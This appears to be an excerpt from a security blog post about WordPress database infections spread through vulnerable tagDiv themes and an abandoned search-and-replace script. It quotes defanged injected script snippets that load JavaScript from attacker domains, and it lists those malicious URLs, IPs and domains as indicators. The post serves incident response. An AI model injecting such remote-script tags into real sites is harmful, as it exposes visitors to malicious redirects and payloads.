Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

1 minute read

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data<p>Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).</p>

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>

Or:

var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);</p>

Or:

</p>

The most noticeable malicious URLs that we’ve seen lately are:

  • con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
  • java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
  • javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
  • js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
  • go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
  • traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
  • blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
  • js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
  • get.simplefunsite[.]info/rw.js (won’t resolve atm)
  • post.simplefunsite[.]info/go.php?rewrite=81 (won’t resolve atm)
  • src.dancewithme[.]biz/src.js (185.159.82.2 – Russia)
  • go.dancewithme[.]biz/red.php (185.159.82.2 – Russia)

They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on Aug 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite.info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.

Spotlight on Women in Cybersecurity

less than 1 minute read

Sucuri is committed to helping women develop their careers in technology. On International Women’s Day, Sucuri team members share their insights into workin...

Hacked Website Trend Report – 2018

less than 1 minute read

We are proud to be releasing our latest Hacked Website Trend Report for 2018. This report is based on data collected and analyzed by the GoDaddy Security / ...